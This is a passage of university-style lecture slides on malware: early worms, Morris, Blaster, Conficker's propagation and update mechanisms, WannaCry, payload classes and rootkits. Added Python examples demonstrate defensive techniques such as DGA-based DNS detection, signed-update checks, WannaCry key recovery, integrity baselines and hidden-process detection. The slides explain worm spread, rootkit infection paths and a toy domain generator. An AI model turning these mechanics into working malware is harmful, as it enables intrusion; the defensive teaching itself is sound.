    § Use information about other hosts present on the infected machine
  § Local subnet
    § A host behind a firewall tries to infect hosts on the same subnet


First Worms

§ Concept introduced in John Brunner's 1975 science fiction novel "The Shockwave Rider"
§ First implementation: an experiment in distributed computing
  § John Shoch and Jon Hupp, Xerox PARC, 1978 (published 1982):
  § Wrote a program they called a worm
  § It replicated itself across the network
  § Created for non-malicious purposes
  § The worm looked for idle processors and assigned tasks to them
  § Any activity on an "infected" workstation caused the worm to shut down


Example: Merry Christmas Worm 1987

[Figure: the text-mode Christmas tree drawn by the worm; image not reproduced]


Example: Merry Christmas Worm 1987

§ Designed for IBM mainframes
  § Written in the mainframe command language REXX
  § Started with a header saying "Don't read me, EXEC me"
  § When run
    § Drew a Christmas tree (see the previous slide)
    § Also checked the address book and the list of previously received e-mails, and sent copies of itself to each address
  § Originally written as a prank rather than out of malice
  § Shut down several IBM networks
§ Really a macro worm
  § Written in a command language that was interpreted


First Famous Worm: Internet Worm 1988

§ Program written by Robert Morris Jr. (hence "Morris worm")
§ Exploits several vulnerabilities to spread from one machine to another via the Internet
  § Password guessing with a dictionary of 432 common passwords
  § Making use of .rhosts files on infected machines
    § A .rhosts file contains a list of host-user combinations that are permitted to log in remotely from the specified host without having to supply a password
  § Problems with sendmail
    § Eric Allman, author of sendmail, wanted continued development access on a production system
    § The system manager would not let him
    § He installed a password-protected back door (the DEBUG command) in the next release
    § Due to a bug, this back door was generally unprotected
  § A stack buffer overflow in the finger daemon (fingerd)
§ The worm tried to camouflage itself
  § It ran under the name sh and obfuscated its strings with a simple Caesar-style cipher
§ Allegedly designed to measure the size of the Internet


Blaster Worm of 2003

§ Also known as Lovsan or Lovesan
  § Contained two messages
    § "I just want to say Love you San!!"
    § "Billy Gates why do you make this possible? Stop making money and fix your software!!"
  § Spread on Windows XP and Windows 2000 computers
  § First noticed in August 2003
  § Spread by exploiting a buffer overflow in the DCOM RPC service (MS03-026; MS03-039 later fixed related flaws)
  § The patch for the overflow had been released in July 2003, a month before the worm
  § The worm was programmed to start a SYN flood against port 80 of windowsupdate.com to create a distributed denial-of-service attack
  § The effect was limited, as Microsoft temporarily took the target name out of DNS (updates were served from a different host name anyway)


Conficker 2008

§ Discovered in November 2008, infected several million computers
  § Also known as "Downup", "Downadup" and "Kido"
§ Targeted various Windows operating systems
  § Windows 2000, XP, Vista, Server 2003, Server 2008, …
§ Exploited the MS08-067 vulnerability in the Server service
  § Allowed remote code execution
§ The patch had already been released in October (!) 2008, before the worm appeared
  § Still, an estimated 30% of Windows PCs remained unpatched in January 2009
  § In April 2010, over six million victim machines were still infected


Propagation

§ Conficker came in five versions: A, B, C, D, E
  § Later variants closed holes previously found in the worm by researchers, A/V vendors, and law enforcement
  § Infected hosts update themselves to the next variant
§ Variants A, B, and E: MS08-067 Server service vulnerability
  § The Server service vulnerability allows remote attackers to execute arbitrary code
  § An already infected source computer
    § uses a specially formatted RPC (remote procedure call) request to force a stack buffer overflow
    § executes shellcode on the target computer


Updating by Vulnerability

§ Variant A patches MS08-067 but does not allow re-infection; updates only via download
§ Variants B, C, and E can additionally
  § perform in-memory patches to the NetBIOS-related DLLs to close MS08-067 AND watch for re-infection attempts
  § Re-infection attempts from more recent versions of Conficker are let through (the exploit doubles as an update channel)


Initial Infection (1)

§ Variants A, B, and E
  § The worm runs an HTTP server on the source computer
  § The target's shellcode connects back to the HTTP server to download a copy of the worm as a dynamically linked library (DLL)
  § Loads the copy into processes such as svchost.exe (Variant A) or the running services.exe or Windows Explorer process (Variant B and higher) by invoking LoadLibrary with the DLL as argument
  § The DLL copies itself into the system root directory under a random file name
  § After initialising Winsock, the malware is executed


Initial Infection (2)

§ Variants B and C can additionally
  § remotely execute copies of themselves on computers visible over NetBIOS through the administrative share (ADMIN$)
    § If the share is password protected, a dictionary attack is used
  § place a copy of their DLL form on any attached removable media (e.g. USB flash drives)
    § can infect new hosts through the Windows AutoRun mechanism


Payload Propagation and Updating

§ Pushing/pulling executables supported


§ Payloads are used by the worm
§ to update itself to newer variants
§ to install additional malware
§ Variant A pulling executables from remote HTTP servers
§ Generates list of 250 domain names per day across five top level domains
§ Domain names are generated using a domain generating algorithm (DGA)
§ pseudo-random number generator seeded with current UCT system date
§ Worm attempts to resolve the domain names
§ If resolution succeeds it establishes an HTTP connection to each domain name
in turn
§ Accepts correctly signed (!) payload from any of them
§ Variant B
§ Increases number of top-level domains to eight and produces domain names
disjoint from those of A every hour and seeds them differently

Detecting Conficker Variants A and B

§ Infections can be detected by reconstructing the domain names generated by the different variants
§ Monitor whether DNS traffic to resolve these domains occurs
§ Identify the source of such traffic as an infected device
§ Register one of the domains in order to see which hosts connect to it and thus identify infected hosts
§ Pre-registering all 500 domains that are used by Conficker A and B would in theory prevent future updates of the worm
§ Domains were blocked until 2010
§ Unfortunately not sufficient: Variant C came up
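The detection approach on this slide (reconstruct the names the DGA will produce today, then watch the resolver logs for them) as an added Python example; it is not code from the lecture, from Conficker or from any vendor tool. The generator is a constructed toy seeded only by the UTC date and stands in for the real DGA, which is not reproduced here; the resolver log lines and the client addresses are constructed as well. Only the Variant A parameters (250 names per day across five TLDs) are taken from the slides.

```python
"""Reconstructing a DGA's daily domain list to spot infected clients in DNS logs.

Added example, not code from the lecture, from Conficker or from any vendor.
The generator below is a constructed toy (SHA-256 of the UTC date and a
counter); Conficker's real algorithm is not reproduced. The log lines in
build_sample_log() are constructed as well.
"""
import hashlib
from datetime import date
from typing import Dict, Iterable, Iterator, List, Tuple

# Toy parameters in the spirit of Variant A: 250 names per day across five TLDs.
TLDS = ("com", "net", "org", "info", "biz")
NAMES_PER_DAY = 250
SAMPLE_DAY = date(2009, 3, 1)   # fixed "today" so the run is reproducible


def toy_dga(day: date, count: int = NAMES_PER_DAY) -> List[str]:
    """Derive `count` domain names from the UTC date alone.

    Because the only seed is the date, a defender who knows the algorithm can
    reproduce the same list and watch for it. (Variant C removed exactly this
    property by seeding from unpredictable, host-dependent values.)
    """
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{day.isoformat()}:{i}".encode()).digest()
        length = 8 + digest[0] % 4                              # 8..11 letters
        label = "".join(chr(ord("a") + b % 26) for b in digest[1:1 + length])
        domains.append(f"{label}.{TLDS[digest[-1] % len(TLDS)]}")
    return domains


def parse_dns_log(lines: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Yield (client_ip, qname) from constructed 'timestamp client qname' lines."""
    for line in lines:
        parts = line.split()
        if len(parts) >= 3:
            yield parts[1], parts[2].lower().rstrip(".")


def find_infected_clients(log_lines: Iterable[str], day: date) -> Dict[str, List[str]]:
    """Map each client that resolved one of the day's generated names to those names."""
    watchlist = set(toy_dga(day))
    hits: Dict[str, List[str]] = {}
    for client, qname in parse_dns_log(log_lines):
        if qname in watchlist:
            hits.setdefault(client, []).append(qname)
    return hits


def build_sample_log(day: date) -> List[str]:
    """Constructed resolver log: benign lookups plus two clients hitting DGA names."""
    generated = toy_dga(day)
    return [
        f"{day}T10:00:01 10.0.0.5 www.example.com.",
        f"{day}T10:00:02 10.0.0.7 {generated[3]}.",
        f"{day}T10:00:03 10.0.0.5 updates.example.net.",
        f"{day}T10:00:04 10.0.0.7 {generated[17]}.",
        f"{day}T10:00:05 10.0.0.9 {generated[200]}.",
    ]


def demo(day: date = SAMPLE_DAY) -> Dict[str, List[str]]:
    """Run the watchlist over the constructed log and return client -> DGA names."""
    return find_infected_clients(build_sample_log(day), day)


if __name__ == "__main__":
    for client, names in demo().items():
        print(f"{client}: {len(names)} DGA lookup(s): {', '.join(names)}")
```

The same watchlist can be fed to a resolver's response-policy zone or to a sinkhole, which is the "register one of the domains" step; the prediction only works because the seed is public, which is what the next slide's Variant C breaks.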

Payload Propagation and Updates (2)

§ Variant C
§ Generates a pool of 50 000 domains daily across 110 top-level domains
§ Randomly selects 500 of them to connect to
§ Uses Windows' random number generator seeded with an unpredictable, host-dependent seed
§ Consequences
§ No reliable prediction of the domains that are going to be contacted is possible any more
§ Expected rate of successful updates: only 1% of infected hosts per day
§ The shorter domain names are expected to collide with 150-200 existing domains per day -> potential for DDoS attacks against these domains
§ Variants D and E create an ad-hoc peer-to-peer network to push and pull payloads over the Internet
§ Heavily obfuscated part of the code

Payload Checking

§ Prevention of payload hijacking
§ Variant A payloads are hashed with SHA-1; payloads are encrypted with RC4 using the 128-bit (Variant A) or 512-bit (Variant B and higher) hash as key; the hash is signed with a 1024-bit or 4096-bit private RSA key and the signature is appended to the binary
§ A payload is only unpacked and executed if the signature verifies with the public key embedded in the worm
§ Conficker Variants A, B, C, and D never downloaded any malicious payload other than updates
§ Conficker E downloaded the spambot Waledac and a scareware product
§ Conficker is still active in 2019 although it is detected by all common A/V products
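The check described on this slide and on the earlier "accepts correctly signed (!) payload" bullet, as an added Python example; it is not code from the lecture or from the worm. Textbook RSA over constructed Mersenne primes stands in for the 1024/4096-bit keys so the block runs on the standard library alone, and the RC4 layer is left out: the property shown is that a payload is only unpacked if its appended signature verifies under the key embedded at build time, which is why a defender who sinkholes a DGA domain can count infected hosts but cannot hand the worm a cleanup binary. The key constants, `SIG_BYTES` and the payload bytes are assumptions of this example.

```python
"""Signed-update check in the style of Conficker's payload verification.

Added example, not code from the lecture or from the worm. Textbook RSA over
constructed Mersenne primes (NOT a secure key size, no padding) stands in for
the real keys; the RC4 layer from the slide is omitted.
"""
import hashlib

SIG_BYTES = 32               # fixed-width field for the appended signature (n < 2^256)

# Constructed toy key material: p, q are Mersenne primes, e is the usual 65537.
P, Q, E = (1 << 107) - 1, (1 << 127) - 1, 65537
N = P * Q                                   # about 2^234, so any 160-bit hash is < N
D = pow(E, -1, (P - 1) * (Q - 1))           # private exponent, held only by the author

# A second, unrelated constructed key standing in for "someone else's" signing key.
P2, Q2 = (1 << 89) - 1, (1 << 107) - 1
N2 = P2 * Q2
D2 = pow(E, -1, (P2 - 1) * (Q2 - 1))


def payload_hash(payload: bytes) -> int:
    """SHA-1 of the payload as an integer (Variant A hashed with SHA-1)."""
    return int.from_bytes(hashlib.sha1(payload).digest(), "big")


def sign_payload(payload: bytes, d: int = D, n: int = N) -> bytes:
    """Append the RSA signature of the payload hash, as described on the slide."""
    sig = pow(payload_hash(payload), d, n)
    return payload + sig.to_bytes(SIG_BYTES, "big")


def verify_and_unpack(blob: bytes, e: int = E, n: int = N):
    """Return the payload only if the trailing signature verifies under the
    embedded public key (e, n); otherwise None and nothing gets executed."""
    if len(blob) <= SIG_BYTES:
        return None
    payload, sig = blob[:-SIG_BYTES], int.from_bytes(blob[-SIG_BYTES:], "big")
    if sig >= n:
        return None
    return payload if pow(sig, e, n) == payload_hash(payload) else None


def demo() -> dict:
    """Three cases: genuine update, bit-flipped update, update signed by another key."""
    genuine = sign_payload(b"constructed update binary v2")
    tampered = bytearray(genuine)
    tampered[0] ^= 0x01                                   # flip one payload bit
    foreign = sign_payload(b"constructed cleanup binary", D2, N2)  # right format, wrong key
    return {
        "genuine": verify_and_unpack(genuine) is not None,
        "tampered": verify_and_unpack(bytes(tampered)) is not None,
        "foreign_key": verify_and_unpack(foreign) is not None,
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case:12s} accepted={accepted}")
```

Only the "genuine" case is accepted; the other two are rejected before anything is unpacked, which is the whole point of embedding the public key in the worm body rather than fetching it.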

WannaCry 2.0 Ransomware Worm

§ Major outbreak between May and June 2017
§ Exploited vulnerabilities in several Windows versions
§ For which a patch had been released by Microsoft in March 2017!
§ Exploit implemented in the exploit toolkit EternalBlue
§ Spread over more than 150 countries worldwide, infecting over 200 000 machines
§ Spreading stopped after the kill-switch domain was detected and registered by malware analysts
§ Encrypts files on infected machines using RSA with 2048-bit keys
§ Generates an AES key for encrypting the files and encrypts the AES key with the public RSA key
§ Ransom of the Bitcoin equivalent of initially 300$ demanded
§ Doubled after 3 days; files deleted if the ransom is not paid after 7 days

WannaCry Pop-Up Window

Language Options WannaCry Supports

Example for Infection: DB Display Boards

WannaCry Decryption Tools

§ Released on May 18th 2017 by Quarkslab
§ Malware analysts there found out that WannaCry
§ Generates the RSA public/private key pair used to encrypt/decrypt the files on the infected machine
§ Erases the private key from the system after sending it to a command-and-control server
§ But: does not delete the prime numbers used to generate the keys from memory
§ These can be recovered if the machine has not been rebooted and they have not been overwritten by any other process yet
§ Knowing the prime numbers, the private key can easily be computed from the public key
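The recovery path described here, together with the key scheme from the WannaCry slide above (AES file key wrapped with the victim's RSA public key), as an added Python example; it is not the Quarkslab tool's code and not WannaCry's. Textbook RSA over constructed Mersenne primes stands in for the 2048-bit key, the 16-byte AES key is a constructed value, and the process memory is a constructed byte buffer in which one prime survives; the scan simply tries every 16-byte window as a candidate factor of the public modulus.

```python
"""Recovering the RSA private key from a prime left in memory, the approach of
the Quarkslab WannaCry decryption tool. Added example, not the tool's code and
not WannaCry's. Key sizes, the AES key and the memory image are constructed.
"""
import hashlib
from typing import Optional, Tuple

P, Q, E = (1 << 107) - 1, (1 << 127) - 1, 65537     # constructed, NOT a secure key size
AES_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed file key
WIDTH = 16                                           # byte width of one prime in memory


def make_keypair(p: int, q: int, e: int = E) -> Tuple[int, int, int]:
    """Return (n, e, d); the ransomware sends d away and wipes it locally."""
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))


def wrap_file_key(aes_key: bytes, n: int, e: int) -> int:
    """Encrypt the per-victim AES key under the RSA public key (textbook RSA)."""
    m = int.from_bytes(aes_key, "big")
    assert m < n
    return pow(m, e, n)


def scan_memory_for_factor(n: int, memory: bytes, width: int = WIDTH) -> Optional[int]:
    """Try every `width`-byte window as a little-endian integer and return the
    first one that is a non-trivial factor of n, i.e. a leftover prime."""
    for off in range(0, len(memory) - width + 1):
        x = int.from_bytes(memory[off:off + width], "little")
        if 1 < x < n and n % x == 0:
            return x
    return None


def recover_private_exponent(n: int, e: int, p: int) -> Optional[int]:
    """Given one prime factor of n, rebuild d from the public key alone."""
    if p <= 1 or n % p:
        return None
    q = n // p
    return pow(e, -1, (p - 1) * (q - 1))


def unwrap_file_key(c: int, d: int, n: int, key_len: int = 16) -> bytes:
    """Decrypt the wrapped AES key with the recovered private exponent."""
    return pow(c, d, n).to_bytes(key_len, "big")


# Constructed "memory image": filler bytes with P embedded at some offset.
SIMULATED_MEMORY = (
    bytes(24)
    + hashlib.sha256(b"constructed filler").digest()
    + P.to_bytes(WIDTH, "little")
    + hashlib.sha256(b"more constructed filler").digest()
)


def demo() -> bool:
    """Full path: wrapped key on disk + prime in memory -> original AES key."""
    n, e, d = make_keypair(P, Q)
    c = wrap_file_key(AES_KEY, n, e)          # what the ransomware leaves on disk
    prime = scan_memory_for_factor(n, SIMULATED_MEMORY)
    d_rec = recover_private_exponent(n, e, prime) if prime else None
    return d_rec is not None and unwrap_file_key(c, d_rec, n) == AES_KEY


if __name__ == "__main__":
    print("AES key recovered:", demo())
```

Against a real process dump the scan would walk the memory of the ransomware process at its allocator's alignment and test each 128-byte window against the 2048-bit modulus stored in the public key file; the arithmetic (q = n / p, then d from (p-1)(q-1)) is the same.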

Classification of Payload Types (for Trojans, Viruses, Worms)

§ Non-destructive – e.g. displaying funny messages, flashing an image on the screen, sending a virus hoax, i.e. a message warning of a new virus that makes the victim forward the message to others, ...
§ Destructive – corrupting files, deleting files, damaging software, ... with no reason other than to harm the victim
§ Commercial or criminal intent – stealing information such as credentials, corporate plans, personal data; gaining remote control of the victim's machine to distribute spam or conduct distributed denial-of-service attacks

Direct and Indirect Harm to Users

§ Direct harm to users
§ Hiding the cursor
§ Displaying text or an image on the screen
§ Opening a browser window to a website related to the current activity
§ Sending email to some or all entries of the victim's contacts
§ Opening text documents and, e.g., changing "is" to "is not"
§ Deleting all files
§ Modifying system program files (e.g. to avoid detection)
§ Stealing and forwarding sensitive information
§ Indirect harm to users
§ Cost of cleaning up the machines
§ Reputation cost for companies and organizations
§ Losing customers due to unavailability of services

Harm to Victim's Systems

§ Malware typically tries to conceal its infection
§ For example, malware may
§ Hide a file in a lower-level directory (e.g. a subdirectory of some legitimate popular program)
§ Attach to a critical system file that is invoked during system startup
§ Replace a non-critical system file
§ Hide copies of the executable in more than one location
§ Modify the system registry so that the malware is always executed or malware detection is disabled

Harm to (the rest of) the World

§ Malware depletes network resources
§ Email traffic
§ Scanning for other hosts on the network with a specific vulnerability
§ Command-and-control traffic for botnets
§ Spam distribution
§ Distributed Denial of Service (DDoS) attacks
§ ...
§ Cleaning up large infections is time- and cost-intensive
§ Owners of infected machines are not necessarily harmed
§ But their machines may be used to harm others
§ E.g. bots used for distributed denial-of-service attacks (see next chapter)

Malware Classification by Payload

§ System Corruption
§ Data Destruction
§ Ransomware
§ Physical-World Damage
§ Logic Bomb
§ Information Theft
§ Keyloggers and spyware
§ Phishing and identity theft
§ Espionage and data exfiltration
§ Stealthing
§ Backdoors and rootkits
§ Bots -> next chapter

System Corruption Payload

§ Data Destruction – deleting data, corrupting the file system, ...
§ Ransomware – encrypts user data and demands payment for decrypting it; typically uses public-key cryptography today
§ Physical-World Damage – e.g. rewriting the BIOS code such that the boot fails, Stuxnet aiming at centrifuges in power plants, ...
§ Logic Bomb – key component of many corruption payloads; contains code that checks the condition that triggers the malicious functionality

Information Theft

§ Keyloggers and spyware
§ Capture keystrokes, take screen captures, activate microphone or cameras, ...
§ Phishing and identity theft
§ A URL included in a spam email or fake instant message links to a fake web page; the fake page logs username/password and redirects to the real website
§ Reconnaissance, espionage and data exfiltration
§ Steal specific confidential information from an infected system

Stealthing – Backdoors and Rootkits

§ Backdoors – secret entry point to a program that allows anyone aware of the backdoor to gain access
§ Rootkits – set of programs installed on a system to
§ maintain covert access to that system with root privileges
§ while hiding evidence of their presence as much as possible
§ Typically alter a victim's standard functionality in a malicious and stealthy way

Rootkits

§ Rootkit
§ Main characteristic: stealthiness
§ hides the infection from the host's owner
§ Typical infection path:
§ Use a stolen password or a dictionary attack to log in
§ Use a buffer overflow in a vulnerable local program to gain root privileges
§ Download rootkit, unpack, compile, install
§ Rootkits often modify parts of the operating system
§ Install themselves as drivers or kernel modules
§ May also install a "back door", e.g. by replacing the login mechanism

Classification of Rootkits

§ Persistent – activates each time the system boots
§ Rootkit must store code in persistent storage, e.g. registry or file system
§ Needs a way for that code to execute without user intervention
§ Memory based
§ No persistent code and thus cannot survive a reboot
§ Harder to detect as it only exists in memory
§ User mode
§ Intercepts calls to APIs and modifies the returned results
§ E.g. an app performs a directory listing; the returned results do not include entries of files associated with the rootkit
§ Kernel mode
§ Intercepts calls to native APIs in kernel mode
§ Can e.g. hide its presence from the kernel's list of active processes
§ Virtual machine based
§ Installs a virtual machine monitor and runs the OS in a virtual machine
§ Can intercept and modify states and events occurring in the virtualized system

Hiding a Rootkit's Presence on UNIX

§ Create a hidden directory
§ /dev/.lib, /usr/src/.poop and similar
§ Often use invisible characters in the directory name
§ Install hacked binaries for system programs such as netstat, ps, ls, du, login
Can't detect the attacker's processes, files or network connections by running the standard UNIX commands!

§ Modified binaries have the same checksum as the originals
§ What should be used instead of a checksum?
§ Some rootkits install an additional IRC backdoor
§ See next chapter on botnets
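One answer to the slide's question, as an added Python example that is not code from the lecture: a file-integrity baseline keyed on a collision-resistant hash (SHA-256) rather than on a checksum. A CRC is linear, so a replacement binary can be padded to carry any target CRC, whereas no practical attack produces a trojaned ps with the same SHA-256 as the original. The example also MACs the baseline itself, because a rootkit that can replace /bin/ps can also edit a baseline file left on the same disk. The "file system" here is a constructed dict of path to bytes so the block runs offline, and the key and paths are assumptions; a real deployment reads the binaries from disk and keeps the baseline and key on read-only or offline media.

```python
"""Integrity baseline for system binaries using a cryptographic hash instead of a checksum.

Added example, not code from the lecture. The 'file system' is a constructed
dict path -> bytes; the baseline key is a constructed placeholder.
"""
import hashlib
import hmac
from typing import Dict

BASELINE_KEY = b"constructed-key-kept-offline"   # in practice: a key the attacker never sees


def sha256_of(data: bytes) -> str:
    """Collision-resistant digest: the attacker cannot craft a replacement binary
    that matches it, which a plain checksum cannot guarantee."""
    return hashlib.sha256(data).hexdigest()


def _mac(entries: Dict[str, str], key: bytes) -> str:
    """HMAC over the serialized baseline so that editing the baseline is detected."""
    serialized = "\n".join(f"{p} {h}" for p, h in sorted(entries.items())).encode()
    return hmac.new(key, serialized, "sha256").hexdigest()


def build_baseline(files: Dict[str, bytes], key: bytes = BASELINE_KEY) -> Dict:
    """Record the digest of every known-good file plus a MAC over the whole table."""
    entries = {path: sha256_of(files[path]) for path in sorted(files)}
    return {"entries": entries, "mac": _mac(entries, key)}


def check_integrity(files: Dict[str, bytes], baseline: Dict, key: bytes = BASELINE_KEY) -> Dict:
    """Compare the current files against the baseline and report what changed."""
    entries = baseline["entries"]
    return {
        "baseline_ok": hmac.compare_digest(_mac(entries, key), baseline["mac"]),
        "modified": [p for p in entries if p in files and sha256_of(files[p]) != entries[p]],
        "missing": [p for p in entries if p not in files],
        "new": [p for p in files if p not in entries],
    }


# Constructed 'clean' system and the same system after a rootkit swapped ps and ls
# and dropped a sniffer into the hidden directory named on the slide.
CLEAN = {
    "/bin/ps": b"constructed clean ps binary",
    "/bin/ls": b"constructed clean ls binary",
    "/bin/netstat": b"constructed clean netstat binary",
}
ROOTKITTED = dict(CLEAN)
ROOTKITTED["/bin/ps"] = b"constructed trojaned ps binary"
ROOTKITTED["/bin/ls"] = b"constructed trojaned ls binary"
ROOTKITTED["/dev/.lib/sniffer"] = b"constructed sniffer"


def demo() -> Dict:
    """Baseline the clean system, then check the rootkitted one."""
    return check_integrity(ROOTKITTED, build_baseline(CLEAN))


if __name__ == "__main__":
    print(demo())
```

The baseline must be taken before the compromise and checked with a hashing tool that is not itself one of the replaced binaries (boot from known-good media, or ship the checker statically linked), otherwise a trojaned sha256sum could lie just like the trojaned ls.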

Detecting Rootkit Presence

§ Sad way to find out
§ Running out of physical disk space because of sniffer logs
§ The logs are invisible because du and ls have been hacked!
§ Manual confirmation
§ Reinstall a clean ps and see what processes are running
§ Automatic detection
§ The rootkit does not alter the data structures normally used by netstat, ps, ls, du, ifconfig
§ Host-based intrusion detection can find rootkit files
§ ... assuming an updated version of the rootkit did not disable your intrusion detection system!
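The "automatic detection" bullet in code, as an added Python example that is not from the lecture: a cross-view check that compares what a (possibly trojaned) ps reports with the process list the kernel itself exposes under /proc, which a user-mode rootkit that only replaced binaries has not touched. `SAMPLE_PS` and `SAMPLE_PROC` are constructed so the check runs offline; `live_check()` applies the same comparison on a real Linux host and takes two /proc snapshots so that processes exiting between the views are not reported as hidden. A kernel-mode rootkit that filters /proc defeats this check, which is the slide's closing caveat in a different form.

```python
"""Cross-view detection of hidden processes: compare what a (possibly trojaned)
ps reports with an independent view taken from /proc.

Added example, not code from the lecture. SAMPLE_PS and SAMPLE_PROC are
constructed; live_check() only runs where /proc and ps exist.
"""
import os
import subprocess
from typing import Iterable, Optional, Set

# Constructed output of a trojaned ps: PID 1337 (the attacker's process) is filtered out.
SAMPLE_PS = """\
  PID TTY          TIME CMD
    1 ?        00:00:03 systemd
  412 ?        00:00:00 sshd
  977 pts/0    00:00:00 bash
"""
# Constructed /proc directory listing: the kernel still has an entry for 1337.
SAMPLE_PROC = ["1", "412", "977", "1337", "cpuinfo", "net", "self", "thread-self"]


def pids_from_ps(ps_output: str) -> Set[int]:
    """First token of every line that starts with a number (header lines are skipped)."""
    pids = set()
    for line in ps_output.splitlines():
        parts = line.split()
        if parts and parts[0].isdigit():
            pids.add(int(parts[0]))
    return pids


def pids_from_proc(entries: Iterable[str]) -> Set[int]:
    """Numeric directory names under /proc are the kernel's own process list."""
    return {int(name) for name in entries if name.isdigit()}


def hidden_processes(ps_output: str, proc_before: Iterable[str],
                     proc_after: Optional[Iterable[str]] = None) -> Set[int]:
    """PIDs the kernel shows but ps does not. A process that exits between the two
    views would look 'hidden', so only PIDs present in both /proc snapshots count."""
    kernel_view = pids_from_proc(proc_before)
    if proc_after is not None:
        kernel_view &= pids_from_proc(proc_after)
    return kernel_view - pids_from_ps(ps_output)


def live_check() -> Set[int]:
    """Run the comparison on a real Linux host; returns an empty set elsewhere."""
    if not os.path.isdir("/proc"):
        return set()
    try:
        before = os.listdir("/proc")
        ps_out = subprocess.run(["ps", "-e", "-o", "pid="],
                                capture_output=True, text=True, check=False).stdout
        after = os.listdir("/proc")
    except OSError:
        return set()
    return hidden_processes(ps_out, before, after)


if __name__ == "__main__":
    print("hidden in constructed sample:", sorted(hidden_processes(SAMPLE_PS, SAMPLE_PROC)))
    print("hidden on this host:", sorted(live_check()))
```

The same idea generalizes to the other hacked tools on the previous slide: compare ls against a raw directory read, and netstat against the socket tables under /proc/net, always taking the second view from an interface the replaced binary does not sit in front of.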

Malware Terminology

§ Advanced Persistent Threat (APT) – Sophisticated malware directed at specific business or political targets, applied persistently and effectively
§ Adware – Advertising integrated in software; often results in pop-up ads or redirection of a browser to a commercial site
§ Attack kit – Set of tools for generating malware, including propagation and payload mechanisms
§ Auto-rooter – Malicious hacking tool used to remotely break into machines
§ Backdoor – Any mechanism that bypasses a security check and allows unauthorized access to functionality in a program or system
§ Downloader – Code that installs other items on a machine, e.g. loads a larger malware package after the initial infection
§ Drive-by-downloads – Uses code in a compromised web site that exploits a vulnerability in the browser or browser plugins
§ Exploit – Code specific to exploiting a single vulnerability or set of vulnerabilities
§ Flooder (DoS engine) – Generates a large volume of data, e.g. to carry out a denial-of-service attack

Malware Terminology (continued)

§ Key logger – Captures keystrokes on the infected system
§ Logic bomb – Code inside a malware that triggers when a specific condition is met
§ Macro virus – Uses macro or scripting code, typically embedded in a document
§ Mobile code – Code that is portable between different platforms
§ Rootkit – Set of hacker tools used to hide the malware and gain root access
§ Spam engines – Used to send large volumes of unwanted email
§ Spyware – Collects information from a computer and transmits it to another system (e.g. key strokes, screen shots, network traffic, ...)
§ Trojan horse – Appears to be useful but also has a secondary malicious purpose
§ Virus – Tries to replicate itself into executable or script code when executed
§ Worm – Runs independently and propagates copies of itself, typically using a software vulnerability
§ Bot (Zombie) – Activated on an infected machine to gain remote control and launch attacks on other machines

References

Basic Reading
§ Charles and Shari Pfleeger, Jonathan Margulies: Security in Computing, 2014
§ Chapter 3.2: Malicious code
§ Stallings and Brown: Computer Security, 2015
§ Chapter 6 on malicious software
§ Matt Bishop: Introduction to Computer Security, 2004
§ Chapter 19: Malicious Logic

Further Reading
§ Jon Erickson: Hacking – The Art of Exploitation, 2007
§ Chapter 3: Exploitation
§ Exploit databases
§ bugtraq
§ US-CERT
§ Ken Thompson: Reflections on Trusting Trust, 1984
§ Peter Capek et al.: Merry Christmas – An Early Network Worm, 2003
§ Felix Leder, Tillmann Werner: Know Your Enemy: Containing Conficker – To Tame a Malware, 2009
§ P. Porras et al.: An Analysis of Conficker's Logic and Rendezvous Protocol, 2009
